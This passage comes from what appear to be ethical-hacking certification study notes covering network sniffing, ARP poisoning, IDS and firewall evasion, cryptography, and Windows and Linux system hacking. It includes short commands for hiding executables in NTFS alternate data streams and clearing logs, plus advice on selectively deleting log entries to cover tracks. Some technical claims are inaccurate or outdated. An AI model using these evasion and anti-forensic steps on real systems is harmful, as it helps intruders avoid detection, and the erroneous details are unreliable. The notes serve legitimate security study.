 32 | - Resolves IP address to a MAC address
 33 | - Packets are ARP_REQUEST and ARP_REPLY
 34 | - Each computer maintains it's own ARP cache, which can be poisoned
 35 | - **Commands**
 36 |   - arp -a - displays current ARP cache
 37 |   - arp -d * - clears ARP cache
 38 | - Works on a broadcast basis - both requests and replies are broadcast to everyone
 39 | - **Gratuitous ARP** - special packet to update ARP cache even without a request
 40 |   - This is used to poison cache on other machines
 41 | 
 42 | ### <u>IPv6</u>
 43 | 
 44 | - Uses 128-bit address
 45 | - Has eight groups of four hexadecimal digits
 46 | - Sections with all 0s can be shorted to nothing (just has start and end colons)
 47 | - Double colon can only be used once
 48 | - Loopback address is ::1
 49 | 
 50 | | IPv6 Address Type | Description                                           |
 51 | | ----------------- | ----------------------------------------------------- |
 52 | | Unicast           | Addressed and intended for one host interface         |
 53 | | Multicast         | Addressed for multiple host interfaces                |
 54 | | Anycast           | Large number of hosts can receive; nearest host opens |
 55 | 
 56 | | IPv6 Scopes | Description                                                  |
 57 | | ----------- | ------------------------------------------------------------ |
 58 | | Link local  | Applies only to hosts on the same subnet (Address block fe80::/10) |
 59 | | Site local  | Applies to hosts within the same organization (Address block FEC0::/10) |
 60 | | Global      | Includes everything                                          |
 61 | 
 62 | - Scope applies for multicast and anycast
 63 | - Traditional network scanning is **computationally less feasible**
 64 | 
 65 | ### <u>Wiretapping</u>
 66 | 
 67 | - **Lawful interception** - legally intercepting communications between two parties
 68 | - **Active** - interjecting something into the communication
 69 | - **Passive** - only monitors and records the data
 70 | - **PRISM** - system used by NSA to wiretap external data coming into US
 71 | 
 72 | ### <u>Active and Passive Sniffing</u>
 73 | 
 74 | - **Passive sniffing** - watching network traffic without interaction; only works for same collision domain
 75 | - **Active sniffing** - uses methods to make a switch send traffic to you even though it isn't destined for your machine
 76 | - **Span port** - switch configuration that makes the switch send a copy of all frames from other ports to a specific port
 77 |   - Not all switches have the ability to do this
 78 |   - Modern switches sometimes don't allow span ports to send data - you can only listen
 79 | - **Network tap** - special port on a switch that allows the connected device to see all traffic
 80 | - **Port mirroring** - another word for span port
 81 | 
 82 | ### <u>MAC Flooding</u>
 83 | 
 84 | - Switches either flood or forward data
 85 | - If a switch doesn't know what MAC address is on a port, it will flood the data until it finds out
 86 | - **CAM Table** - the table on a switch that stores which MAC address is on which port
 87 |   - If table is empty or full, everything is sent  to all ports
 88 | - This works by sending so many MAC addresses to the CAM table that it can't keep up
 89 | - **Tools**
 90 |   - Etherflood
 91 |   - Macof
 92 | - **Switch port stealing** - tries to update information regarding a specific port in a race condition
 93 | - MAC Flooding will often destroy the switch before you get anything useful, doesn't last long and it will get you noticed.  Also, most modern switches protect against this.
 94 | 
 95 | ### <u>ARP Poisoning</u>
 96 | 
 97 | - Also called ARP spoofing or gratuitous ARP
 98 | - This can trigger alerts because of the constant need to keep updating the ARP cache of machines
 99 | - Changes the cache of machines so that packets are sent to you instead of the intended target
100 | - **Countermeasures**
101 |   - Dynamic ARP Inspection using DHCP snooping
102 |   - XArp can also watch for this
103 |   - Default gateway MAC can also be added permanently into each machine's cache
104 | - **Tools**
105 |   - Cain and Abel
106 |   - WinArpAttacker
107 |   - Ufasoft
108 |   - dsniff
109 | 
110 | ### <u>DHCP Starvation</u>
111 | 
112 | - Attempt to exhaust all available addresses from the server
113 | - Attacker sends so many requests that the address space allocated is exhausted
114 | - DHCPv4 packets - DHCPDISCOVER, DHCPOFFER, DHCPREQUEST, DHCPACK
115 | - DHCPv6 packets - Solicit, Advertise, Request (Confirm/Renew), Reply
116 | - **DHCP Steps**
117 |   1. Client sends DHCPDISCOVER
118 |   2. Server responds with DHCPOFFER
119 |   3. Client sends request for IP with DHCPREQUEST
120 |   4. Server sends address and config via DHCPACK
121 | - **Tools**
122 |   - Yersinia
123 |   - DHCPstarv
124 | - Mitigation is to configure DHCP snooping
125 | - **Rogue DHCP Server** - setup to offer addresses instead of real server.  Can be combined with starvation to real server.
126 | 
127 | ### <u>Spoofing</u>
128 | 
129 | - **MAC Spoofing** - changes your MAC address.  Benefit is CAM table uses most recent address.
130 | - Port security can slow this down, but doesn't always stop it
131 | - MAC Spoofing makes the switch send all packets to your address instead of the intended one until the CAM table is updated with the real address again
132 | - **IRDP Spoofing** - hacker sends ICMP Router Discovery Protocol messages advertising a malicious gateway
133 | - **DNS Poisoning** - changes where machines get their DNS info from, allowing attacker to redirect to malicious websites
134 | 
135 | ### <u>Sniffing Tools</u>
136 | 
137 | - **Wireshark**
138 |   - Previously known as Ethereal
139 |   - Can be used to follow streams of data
140 |   - Can also filter the packets so you can find a specific type or specific source address
141 |   - **Example filters**
142 |     - ! (arp or icmp or dns) - filters out the "noise" from ARP, DNS and ICMP requests
143 |     - http.request - displays HTTP GET requests
144 |     - tcp contains string - displays TCP segments that contain the word "string"
145 |     - ip.addr==172.17.15.12 && tcp.port==23 - displays telnet packets containing that IP
146 |     - tcp.flags==0x16 - filters TCP requests with ACK flag set
147 | - **tcpdump**
148 |   - Recent version is WinDump (for Windows)
149 |   - **Syntax**
150 |     - tcpdump flag(s) interface
151 |     - tcpdump -i eth1 - puts the interface in listening mode
152 | - **tcptrace**
153 |   - Analyzes files produced by packet capture programs such as Wireshark, tcpdump and Etherpeek
154 | - **Other Tools**
155 |   - **Ettercap** - also can be used for MITM attacks, ARP poisoning.  Has active and passive sniffing.
156 |   - **Capsa Network Analyzer**
157 |   - **Snort** - usually discussed as an Intrusion Detection application
158 |   - **Sniff-O-Matic**
159 |   - **EtherPeek**
160 |   - **WinDump**
161 |   - **WinSniffer**
162 | 
163 | ### <u>Devices To Evade</u>
164 | 
165 | - **Intrusion Detection System** (IDS) - hardware or software devices that examine streams of packets for malicious behavior
166 |   - **Signature based** - compares packets against a list of known traffic patterns
167 |   - **Anomaly based** - makes decisions on alerts based on learned behavior and "normal" patterns
168 |   - **False negative** - case where traffic was malicious, but the IDS did not pick it up
169 |   - **HIDS** (Host-based intrusion detection system) - IDS that is host-based
170 |   - **NIDS** (Network-based intrusion detection system) - IDS that scans network traffic
171 | - **Snort** - a widely deployed IDS that is open source
172 |   - Includes a sniffer, traffic logger and a protocol analyzer
173 |   - Runs in three different modes
174 |     - **Sniffer** - watches packets in real time
175 |     - **Packet logger** - saves packets to disk for review at a later time
176 |     - **NIDS** - analyzes network traffic against various rule sets
177 |   - Configuration is in /etc/snort on Linux and c:\snort\etc in Windows
178 |   - **Rule syntax**
179 |     - alert tcp !HOME_NET any -> $HOME_NET 31337 (msg : "BACKDOOR ATTEMPT-Backorifice")
180 |       - This alerts about traffic coming not from an external network to the internal one on port 31337
181 |   - **Example output**
182 |     - 10/19-14:48:38.543734 0:48:542:2A:67 -> 0:10:B5:3C:34:C4 type:0x800 len:0x5EA
183 |       **xxx -> xxx TCP TTL:64 TOS:0x0 ID:18112 IpLen:20 DgmLen:1500 DF**
184 |     - Important info is bolded
185 | - **Firewall**
186 |   - An appliance within a network that protects internal resources from unauthorized access
187 |   - Only uses rules that **implicitly denies** traffic unless it is allowed
188 |   - Oftentimes uses **network address translation** (NAT) which can apply a one-to-one or one-to-many relationship between external and internal IP addresses
189 |   - **Screened subnet** - hosts all public-facing servers and services
190 |   - **Bastion hosts** - hosts on the screened subnet designed to protect internal resources
191 |   - **Private zone** - hosts internal hosts that only respond to requests from within that zone
192 |   - **Multi-homed** - firewall that has two or more interfaces
193 |   - **Packet-filtering** - firewalls that only looked at headers
194 |   - **Stateful inspection** - firewalls that track the entire status of a connection
195 |   - **Circuit-level gateway** - firewall that works on Layer 5 (Session layer)
196 |   - **Application-level gateway** - firewall that works like a proxy, allowing specific services in and out
197 | 
198 | ### <u>Evasion Techniques</u>
199 | 
200 | - **Slow down** - faster scanning such as using nmap's -T5 switch will get you caught.  Pros use -T1 switch to get better results
201 | - **Flood the network** - trigger alerts that aren't your intended attack so that you confuse firewalls/IDS and network admins
202 | - **Fragmentation** -  splits up packets so that the IDS can't detect the real intent
203 | - **Unicode encoding** - works with web requests - using Unicode characters instead of ascii can sometimes get past
204 | - **Tools**
205 |   - **Nessus** - also a vulnerability scanner
206 |   - **ADMmutate** - creates scripts not recognizable by signature files
207 |   - **NIDSbench** - older tool for fragmenting bits
208 |   - **Inundator** - flooding tool
209 | 
210 | ### <u>Firewall Evasion</u>
211 | 
212 | - ICMP Type 3 Code 13 will show that traffic is being blocked by firewall
213 | - ICMP Type 3 Code 3 tells you the client itself has the port closed
214 | - Firewall type can be discerned by banner grabbing
215 | - **Firewalking** - going through every port on a firewall to determine what is open
216 | - **Tools**
217 |   - CovertTCP
218 |   - ICMP Shell
219 |   - 007 Shell
220 | - The best way around a firewall will always be a compromised internal machine
221 | 
222 | ### <u>Honeypots</u>
223 | 
224 | - A system setup as a decoy to entice attackers
225 | - Should not include too many open services or look too easy to attack
226 | - **High interaction** - simulates all services and applications and is designed to be completely compromised
227 | - **Low interaction** - simulates a number of services and cannot be completely compromised
228 | - **Examples**
229 |   - Specter
230 |   - Honeyd
231 |   - KFSensor
232 | 


--------------------------------------------------------------------------------
/11 - Cryptography 101.md:
--------------------------------------------------------------------------------
  1 | # Cryptography 101
  2 | 
  3 | ### <u>Cryptograph Basics</u>
  4 | 
  5 | - **Cryptography** - science or study of protecting information whether in transit or at rest
  6 |   - Renders the information unusable to anyone who can't decrypt it
  7 |   - Takes plain text, applies cryptographic method, turn it into cipher text
  8 | - **Cryptanalysis** - study and methods used to crack cipher text
  9 | - **Linear Cryptanalysis** - works best on block ciphers
 10 | - **Differential Cryptanalysis** - applies to symmetric key algorithms
 11 |   - Compares differences in the inputs to how each one affects the outcome
 12 | - **Integral cryptanalysis** - input vs output comparison same as differential; however, runs multiple computations of the same block size input
 13 | - Plain text doesn't necessarily mean ASCII format - it simply means unencrypted data
 14 | - **Nonrepudiation** - means by which a recipient can ensure the identity of the sender and neither party can deny sending
 15 | 
 16 | ### <u>Encryption Algorithms and Techniques</u>
 17 | 
 18 | - **Algorithm** - step-by-step method of solving a problem
 19 | - **Two General Forms of Cryptography**
 20 |   - **Substitution** - bits are replaced by other bits
 21 |   - **Transposition** - doesn't replace;  simply changes order
 22 | - **Encryption Algorithms** - mathematical formulas used to encrypt and decrypt data
 23 | - **Steam Cipher** - readable bits are encrypted one at a time in a continuous stream
 24 |   - Usually done by an XOR operation
 25 |   - Work at a high rate of speed
 26 | - **Block Cipher** - data bits are split up into blocks and fed into the cipher
 27 |   - Each block of data (usually 64 bits) encrypted with key and algorithm
 28 |   - Are simpler and slower than stream ciphers
 29 | - **XOR** - exclusive or; if inputs are the same (0,0 or 1,1), function returns 0; if inputs are not the same (0,1 or 1,0), function returns 1
 30 | - Key chosen for cipher must have a length larger than the data; if not, it is vulnerable to frequency attacks
 31 | 
 32 | ### <u>Symmetric Encryption</u>
 33 | 
 34 | - **Symmetric Encryption** - known as single key or shared key
 35 |   - One key is used to encrypt and decrypt the data
 36 |   - Problems include key distribution and management
 37 |   - Suitable for large amounts of data
 38 |   - Harder for groups of people because more keys are needed as group increases
 39 |   - Does nothing for nonrepudiation; only performs confidentiality
 40 | - **Algorithms**
 41 |   - **DES** - block cipher; 56 bit key; quickly outdated and now considered not very secure
 42 |   - **3DES** - block cipher; 168 bit key; more effective than DES but much slower
 43 |   - **AES** (Advanced Encryption Standard) - block cipher; 128, 192 or 256 bit key; replaces DES; much faster than DES and 3DES
 44 |   - **IDEA** (International Data Encryption Algorithm) - block cipher; 128 bit key; originally used in PGP 2.0
 45 |   - **Twofish** - block cipher; up to 256 bit key
 46 |   - **Blowfish** - fast block cipher; replaced by AES; 64 bit block size; 32 to 448 bit key; considered public domain
 47 |   - **RC** (Rivest Cipher) - RC2 to RC6; block cipher; comparable key length up to 2040 bits; RC6 (latest version) uses 128 bit blocks and 4 bit working registers; RC5 uses variable block sizes and 2 bit working registers. RC4 is a stream cipher
 48 | 
 49 | ### <u>Asymmetric Encryption</u>
 50 | 
 51 | - Uses two types of keys for encryption and decryption
 52 | - **Public Key** - generally used for encryption; can be sent to anyone
 53 | - **Private Key** - kept secret; used for decryption
 54 | - Comes down to what one key encrypts, the other decrypts
 55 | - The private key is used to digitally sign a message
 56 | - **Algorithms**
 57 |   - **Diffie-Hellman** - developed as a key exchange protocol; used in SSL and IPSec; if digital signatures are waived, vulnerable to MITM attacks
 58 |   - **Elliptic Curve Cryptosystem** (ECC) - uses points on elliptical curve along with logarithmic problems; uses less processing power; good for mobile devices
 59 |   - **El Gamal** - not based on prime number factoring; uses solving of discrete logarithm problems
 60 |   - **RSA** - achieves strong encryption through the use of two large prime numbers; factoring these create key sizes up to 4096 bits; modern de facto standard
 61 | - Only downside is it's slower than symmetric especially on bulk encryption and processing power
 62 | 
 63 | ### <u>Hash Algorithms</u>
 64 | 
 65 | - **Hash** - one-way mathematical function that produces a fix-length string (hash) based on the arrangement of data bits in the input
 66 | - **Algorithms**
 67 |   - **MD5** (Message Digest algorithm) - produces 128 bit hash expressed as 32 digit hexadecimal number; has serious flaws; still used for file download verification
 68 |   - **SHA-1** - developed by NSA; 160 bit value output
 69 |   - **SHA-2** - four separate hash functions; produce outputs of 224, 256, 384 and 512 bits; not widely used
 70 |   - **SHA-3** - uses sponge construction
 71 |   - **RIPEMD-#** - works through 80 stages, executing 5 blocks 16 times each; uses modulo 32 addition
 72 | - **Collision** - occurs when two or more files create the same output
 73 |   - Can happen and can be used an attack; rare, though
 74 | - **DUHK Attack** (Don't Use Hard-Coded Keys) - allows attackers to access keys in certain VPN implementations; affects devices using ANSI X9.31 with a hard-coded seed key
 75 | - **Rainbow Tables** - contain precomputed hashes to try and find out passwords
 76 | - **Salt** - used with a hash to obscure the hash; collection of random bits
 77 | - **Things to Remember**
 78 |   - Hashes are used for integrity
 79 |   - Hashes are one-way functions
 80 | - **Tools**
 81 |   - HashCalc
 82 |   - MD5 Calculator
 83 |   - HashMyFiles
 84 | 
 85 | ### <u>Steganography</u>
 86 | 
 87 | - **Steganography** - practice of concealing a message inside another medium so that only the sender and recipient know of its existence
 88 | - **Ways to Identify**
 89 |   - Text - character positions are key - blank spaces, text patterns
 90 |   - Image - file larger in size; some may have color palette faults
 91 |   - Audio & Video - require statistical analysis
 92 | - **Methods**
 93 |   - Least significant bit insertion - changes least meaningful bit
 94 |   - Masking and filtering (grayscale images) - like watermarking
 95 |   - Algorithmic transformation - hides in mathematical functions used in image compression
 96 | - **Tools**
 97 |   - QuickStego
 98 |   - gifshuffle
 99 |   - SNOW
100 |   - Steganography Studio
101 |   - OpenStego
102 | 
103 | ### <u>PKI System</u>
104 | 
105 | - **Public Key Infrastructure** (PKI) - structure designed to verify and authenticate the identity of individuals
106 | - **Registration Authority** - verifies user identity
107 | - **Certificate Authority** - third party to the organization; creates and issues digital certificates
108 | - **Certificate Revocation List** (CRL) - used to track which certificates have problems and which have been revoked
109 | - **Validation Authority** - used to validate certificates via Online Certificate Status Protocol (OCSP)
110 | - **Trust Model** - how entities within an enterprise deal with keys, signatures and certificates
111 | - **Cross-Certification** - allows a CA to trust another CS in a completely different PKI; allows both CAs to validate certificates from either side
112 | - **Single-authority system** - CA at the top
113 | - **Hierarchical trust system** - CA at the top (root CA); makes use of one or more RAs (subordinate CAs) underneath it to issue and manage certificates
114 | 
115 | ### <u>Digital Certificates</u>
116 | 
117 | - **Certificate** - electronic file that is used to verify a user's identity; provides nonrepudiation
118 | - **X.509** - standard used for digital certificates
119 | - **Contents of a Digital Certificate**
120 |   - **Version** - identifies certificate format
121 |   - **Serial Number** - used to uniquely identify certificate
122 |   - **Subject** - who or what is being identified
123 |   - **Algorithm ID** (Signature Algorithm) - shows the algorithm that was used to create the certificate
124 |   - **Issuer** - shows the entity that verifies authenticity
125 |   - **Valid From and Valid To** - dates certificate is good for
126 |   - **Key Usage** - what purpose the certificate serves
127 |   - **Subject's Public Key** - copy of the subject's public key
128 |   - **Optional Fields** - Issuer Unique Identifier, Subject Alternative Name, and Extensions
129 | - Some root CAs are automatically added to OSes that they already trust; normally are reputable companies
130 | - **Self-Signed Certificates** - certificates that are not signed by a CA; generally not used for public; used for development purposes
131 |   - Signed by the same entity it certifies
132 | 
133 | ### <u>Digital Signatures</u>
134 | 
135 | - When signing a message, you sign it with your **private** key and the recipient decrypts the hash with your **public** key
136 | - **Digital Signature Algorithm** (DSA) - used in generation and verification of digital signatures per FIPS 186-2
137 | 
138 | ### <u>Full Disk Encryption</u>
139 | 
140 | - **Data at Rest** (DAR) - data that is in a stored state and not currently accessible
141 |   - Usually protected by **full disk encryption** (FDE) with pre-boot authentication
142 |   - Example of FDE is Microsoft BitLocker and McAfee Endpoint Encryption
143 |   - FDE also gives protection against boot-n-root
144 | 
145 | ### <u>Encrypted Communication</u>
146 | 
147 | - **Often-Used Encrypted Communication Methods**
148 |   - **Secure Shell** (SSH) - secured version of telnet; uses port 22; relies on public key cryptography; SSH2 is successor and includes SFTP
149 |   - **Secure Sockets Layer** (SSL) - encrypts data at transport layer and above; uses RSA encryption and digital certificates; has a six-step process; largely has been replaced by TLS
150 |   - **Transport Layer Security** (TLS) - uses RSA 1024 and 2048 bits; successor to SSL; allows both client and server to authenticate to each other; TLS Record Protocol provides secured communication channel
151 |   - **Internet Protocol Security** (IPSEC) - network layer tunneling protocol; used in tunnel and transport modes; ESP encrypts each packet
152 |   - **PGP** - Pretty Good Privacy; used for signing, compress and encryption of emails, files and directories; known as hybrid cryptosystem - features conventional and public key cryptography
153 |   - **S/MIME** - standard for public key encryption and signing of MIME data; only difference between this and PGP is PGP can encrypt files and drives unlike S/MIME
154 | - **Heartbleed** - attack on OpenSSL heartbeat which verifies data was received correctly
155 |   - Vulnerability is that a single byte of data gets 64kb from the server
156 |   - This data is random; could include usernames, passwords, private keys, cookies; very easy to pull off
157 |   - nmap -d --script ssl-heartbleed --script-args vulns.showall -sV [host]
158 |   - Vulnerable versions include Open SSL 1.0.1 and 1.0.1f
159 |   - CVE-2014-0160
160 | - **FREAK** (Factoring Attack on RSA-EXPORT Keys) - man-in-the-middle attack that forces a downgrade of RSA key to a weaker length
161 | - **POODLE** (Paddling Oracle On Downgraded Legacy Encryption) - downgrade attack that used the vulnerability that TLS downgrades to SSL if a connection cannot be made
162 |   - SSl 3 uses RC4, which is easy to crack
163 |   - CVE-2014-3566
164 |   - Also called PoodleBleed
165 | - **DROWN** (Decrypting RSA with Obsolete and Weakened eNcyption) - affects SSL and TLS services
166 |   - Allows attackers to break the encryption and steal sensitive data
167 |   - Uses flaws in SSL v2
168 |   - Not only web servers; can be IMAP and POP servers as well
169 | 
170 | ### <u>Cryptography Attacks</u>
171 | 
172 | - **Known plain-text attack** - has both plain text and cipher-text; plain-text scanned for repeatable sequences which is compared to cipher text
173 | - **Chosen plain-text attack** - attacker encrypts multiple plain-text copies in order to gain the key
174 | - **Adaptive chosen plain-text attack** - attacker makes a series of interactive queries choosing subsequent plaintexts based on the information from the previous encryptions; idea is to glean more and more information about the full target cipher text and key
175 | - **Cipher-text-only attack** - gains copies of several encrypted messages with the same algorithm; statistical analysis is then used to reveal eventually repeating code
176 | - **Replay attack**
177 |   - Usually performed within context of MITM attack
178 |   - Hacker repeats a portion of cryptographic exchange in hopes of fooling the system to setup a communications channel
179 |   - Doesn't know the actual data - just has to get timing right
180 | - **Chosen Cipher Attack**
181 |   - Chooses a particular cipher-text message
182 |   - Attempts to discern the key through comparative analysis
183 |   - RSA is particularly vulnerable to this
184 | - **Side-Channel Attack**
185 |   - Monitors environmental factors such as power consumption, timing and delay
186 | - **Tools**
187 |   - Carnivore and Magic Lantern - used by law enforcement for cracking codes
188 |   - L0phtcrack - used mainly against Windows SAM files
189 |   - John the Ripper - UNIX/Linux tool for the same purpose
190 |   - PGPcrack - designed to go after PGP-encrypted systems
191 |   - CrypTool
192 |   - Cryptobench
193 |   - Jipher
194 | - Keys should still change on a regular basis even though they may be "unhackable"
195 | - Per U.S. government, an algorithm using at least a 256-bit key cannot be cracked
196 | 


--------------------------------------------------------------------------------
/5 - Attacking a System.md:
--------------------------------------------------------------------------------
  1 | # Attacking a System
  2 | 
  3 | <u>Windows Security Architecture</u>
  4 | 
  5 | - Authentication credentials stored in SAM file
  6 | - File is located at C:\windows\system32\config
  7 | - Older systems use LM hashing.  Current uses NTLM v2 (MD5)
  8 | - Windows network authentication uses Kerberos
  9 | - **LM Hashing**
 10 |   - Splits the password up.  If it's over 7 characters, it is encoded in two sections.
 11 |   - If one section is blank, the hash will be AAD3B435B51404EE
 12 |   - Easy to break if password  is 7 characters or under because you can split the hash
 13 | - SAM file presents as UserName:SID:LM_Hash:NTLM_Hash:::
 14 | - **Ntds.dit** - database file on a domain controller that stores passwords
 15 |   - Located in %SystemRoot%\NTDS\Ntds.dit or
 16 |   - Located in %SystemRoot%System32\Ntds.dit
 17 |   - Includes the entire Active Directory
 18 | - **Kerberos**
 19 |   - Steps of exchange
 20 |     1. Client asks **Key Distribution Center** (KDC) for a ticket.  Sent in clear text.
 21 |     2. Server responds with **Ticket Granting Ticket** (TGT).  This is a secret key which is hashed by the password copy stored  on the server.
 22 |     3. If client can decrypt it, the TGT is sent back to the server requesting a **Ticket Granting Service** (TGS) service ticket.
 23 |     4. Server sends TGS service ticket which client uses to access resources.
 24 |   - **Tools**
 25 |     - KerbSniff
 26 |     - KerbCrack
 27 |     - Both take a  long time to crack
 28 | - **Registry**
 29 |   - Collection of all settings and configurations that make the system run
 30 |   - Made up of keys and values
 31 |   - Root level keys
 32 |     - **HKEY_LOCAL_MACHINE** (HKLM) - information on hardware and software
 33 |     - **HKEY_CLASSES_ROOT** (HKCR) - information on file associates and OLE classes
 34 |     - **HKEY_CURRENT_USER** (HKCU) - profile information for the current user including preferences
 35 |     - **HKEY_USERS** (HKU) - specific user configuration information  for all currently active users
 36 |     - **HKEY_CURRENT_CONFIG** (HKCC) - pointer to HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Hardware Profiles\Current
 37 |   - Type of values
 38 |     - **REG_SZ** - character string
 39 |     - **REG_EXPAND_SZ** - expandable string value
 40 |     - **REG_BINARY** - a binary value
 41 |     - **REG_DWORD** - 32-bit unsigned integer
 42 |     - **REG_LINK** - symbolic link to another key
 43 |   - Important Locations
 44 |     - HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
 45 |     - HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices
 46 |     - HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce
 47 |     - HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
 48 |   - Executables to edit
 49 |     - regedit.exe
 50 |     - regedt32.exe (preferred by Microsoft)
 51 | - **MMC**
 52 |   - Microsoft Management Console - used by Windows to administer system
 53 |   - Has "snap-ins" that allow you to modify sets (such as Group Policy Editor)
 54 | 
 55 | ### <u>Linux Security Architecture</u>
 56 | 
 57 | - Linux root is just a slash (/)
 58 | - Important locations
 59 |   - **/** - root directory
 60 |   - **/bin** - basic Linux commands
 61 |   - **/dev** - contains pointer locations to various storage and input/output systems
 62 |   - **/etc** - all administration files and passwords.  Both password and shadow files are here
 63 |   - **/home** - holds the user home directories
 64 |   - **/mnt** - holds the access locations you've mounted
 65 |   - **/sbin** - system binaries folder which holds more administrative commands
 66 |   - **/usr** - holds almost all of the information, commands and files unique to the users
 67 | - Linux Commands
 68 | 
 69 | | Command  | Description                                                  |
 70 | | -------- | ------------------------------------------------------------ |
 71 | | adduser  | Adds a user to the system                                    |
 72 | | cat      | Displays contents of file                                    |
 73 | | cp       | Copies                                                       |
 74 | | ifconfig | Displays network configuration information                   |
 75 | | kill     | Kills a running process                                      |
 76 | | ls       | Displays the contents of a folder.  -l option provides most information. |
 77 | | man      | Displays the manual page for a command                       |
 78 | | passwd   | Used to change password                                      |
 79 | | ps       | Process status.  -ef option shows all processes              |
 80 | | rm       | Removes files.  -r option recursively removes all directories and subdirectories |
 81 | | su       | Allows you to perform functions as another user (super user) |
 82 | 
 83 | - Adding an ampersand after a process name indicates it should run in the background.
 84 | - **pwd** - displays curennt directory
 85 | - **chmod** - changes the permissions of a folder or file
 86 |   - Read is 4, write is 2 and execute is 1
 87 |   - First number is user, second is group, third is others
 88 |   - Example - 755 is everything for users, read/execute for group, and read/execute for others
 89 | - Root has UID and GID of 0
 90 | - First user has UID and GID of 500
 91 | - Passwords are stored in /etc/shadow for most current systems
 92 | - /etc/password stores passwords in hashes.
 93 | - /etc/shadow stores passwords encrypted (hashed and salted) and is only accessible by root
 94 | 
 95 | ### <u>System Hacking Goals</u>
 96 | 
 97 | - **Gaining Access** - uses information gathered to exploit the system
 98 | - **Escalating Privileges** - granting the account you've hacked admin or pivoting to an admin account
 99 | - **Executing Applications** - putting back doors into the system so that you can maintain access
100 | - **Hiding Files** - making sure the files you leave behind are not discoverable
101 | - **Covering Tracks** - cleaning up everything else (log files, etc.)
102 |   - **clearev** - meterpreter shell command to clear log files
103 |   - Clear MRU list in Windows
104 |   - In Linux, append a dot in front of a file to hide it
105 | 
106 | ### <u>Authentication and Passwords</u>
107 | 
108 | - **Three Different Types**
109 |   - **Something You Are** - uses biometrics to validate identity (retina, fingerprint, etc.)
110 |     - Downside is there can be lots of false negatives
111 |     - **False acceptance rate** (FAR) - rate that a system accepts access for people that shouldn't have it
112 |     - **False rejection rate** (FRR) - rate that a system rejects access for someone who should have it
113 |     - **Crossover error rate** (CER) - combination of the two; the lower the CER, the better the system
114 |     - **Active** - requires interaction (retina scan or fingerprint scanner)
115 |     - **Passive** - requires no interaction (iris scan)
116 |   - **Something You Have** - usually consists of a token of some kind (swipe badge, ATM card, etc.)
117 |     - This type usually requires something alongside it (such as a PIN for an ATM card)
118 |     - Some tokens are single-factor (such as a plug-and-play authentication)
119 |   - **Something You Know** - better known as a password
120 |     - Most systems use this because it is universal and well-known
121 | 
122 | - **Two-Factor** - when you have two types of authentication such as something you know (password) and something you have (access card)
123 | 
124 | - **Strength of passwords** - determined by length and complexity
125 |   - ECC says that both should be combined for the best outcome
126 |   - Complexity is defined by number of character sets used (lower case, upper case, numbers, symbols, etc.)
127 | - **Default passwords** - always should be changed and never left what they came with.  Databases such as cirt.net, default-password.info and open-sez.me all have databases of these
128 | 
129 | ### <u>Password Attacks</u>
130 | 
131 | - **Non-electronic** - social engineering attacks - most effective.
132 |   - Includes shoulder surfing and dumpster diving
133 | - **Active online** - done by directly communicating with the victim's machine
134 |   - Includes dictionary and brute-force attacks, hash injections, phishing, Trojans, spyware, keyloggers and password guessing
135 |   - **Keylogging** - process of using a hardware device or software application to capture keystrokes of a user
136 |   - **LLMNR/NBT-NS** - attack based off Windows technologies that caches DNS locally.  Responding to these poisons the local cache.  If an NTLM v2 hash is sent over, it can be sniffed out and then cracked
137 |     - **Tools**
138 |       - NBNSpoof
139 |       - Pupy
140 |       - Metasploit
141 |       - Responder
142 |     - LLMNR uses UDP 5355
143 |     - NBT-NS uses UDP 137
144 |   - Active online attacks are easier to detect and take a longer time
145 |   - Can combine "net" commands with a tool such as **NetBIOS Auditing tool** or **Legion** to automate the testing of user IDs and passwords
146 |   - **Tools**
147 |     - Hydra
148 |     - Metasploit
149 | - **Passive online** - sniffing the wire in hopes of intercepting a password in clear text or attempting a replay attack or man-in-the-middle attack
150 |   - **Tools**
151 |     - **Cain and Abel** - can poison ARP and then monitor the victim's traffic
152 |     - **Ettercap** - works very similar to Cain and Abel.  However, can also help against SSL encryption
153 |     - **KerbCrack** - built-in sniffer and password cracker looking for port 88 Kerberos traffic
154 |     - **ScoopLM** - specifically looks for Windows authentication traffic on the wire and has a password cracker
155 | - **Offline** - when the hacker steals a copy of the password file and does the cracking on a separate system
156 |   - **Dictionary Attack** - uses a word list to attack the password.  Fastest method of attacking
157 |   - **Brute force attack** - tries every combination of characters to crack a password
158 |     - Can be faster if you know parameters (such as at least 7 characters, should have a special character, etc.)
159 |   - **Hybrid attack** - Takes a dictionary attack and replaces characters (such as a 0 for an o) or adding numbers to the end
160 |   - **Rainbow tables** - uses pre-hashed passwords to compare against a password hash.  Is faster because the hashes are already computed.
161 |   - **Tools**
162 |     - Cain
163 |     - KerbCrack
164 |     - Legion
165 |     - John the Ripper
166 | 
167 | ### <u>Privilege Escalation and Executing Applications</u>
168 | 
169 | - **Vertical** - lower-level user executes code at a higher privilege level
170 | - **Horizontal** - executing code at the same user level but from a location that would be protected from that access
171 | - **Four Methods**
172 |   - Crack the password of an admin - primary aim
173 |   - Take advantage of an OS vulnerability
174 |     - **DLL Hijacking** - replacing a DLL in the application directory with your own version which gives you the access you need
175 |   - Use a tool that will provide you the access such as Metasploit
176 |   - Social engineering a user to run an application
177 | - ECC refers executing applications as "owning" a system
178 | - **Executing applications** - starting things such as keyloggers, spyware, back doors and crackers
179 | 
180 | ### <u>Hiding Files and Covering Tracks</u>
181 | 
182 | - In Windows, **Alternate Data Stream** (ADS) can hide files
183 |   - Hides a file from directory listing on an NTFS file system
184 |   - readme.txt:badfile.exe
185 |   - Can be run by start readme.txt:badfile.exe
186 |   - You can also create a link to this and make it look real (e.g. mklink innocent.exe readme.txt:badfile.exe)
187 |   - Every forensic kit looks for this, however
188 |   - To show ADS, dir /r does the trick
189 |   - You can also blow away all ADS by copying files to a FAT partition
190 | - You can also hide files by attributes
191 |   - In Windows:  attrib +h filename
192 |   - In Linux, simply add a . to the beginning of the filename
193 | - Can hide data and files with steganography
194 | - Also need to worry about clearing logs
195 |   - In Windows, you need to clear application, system and security logs
196 |   - Don't just delete; key sign that an attack has happened
197 |   - Option is to corrupt a log file - this happens all the time
198 |   - Best option is be selective and delete the entries pertaining to your actions.
199 | - Can also disable auditing ahead of time to prevent logs from being captured
200 | 
201 | ### <u>Rootkits</u>
202 | 
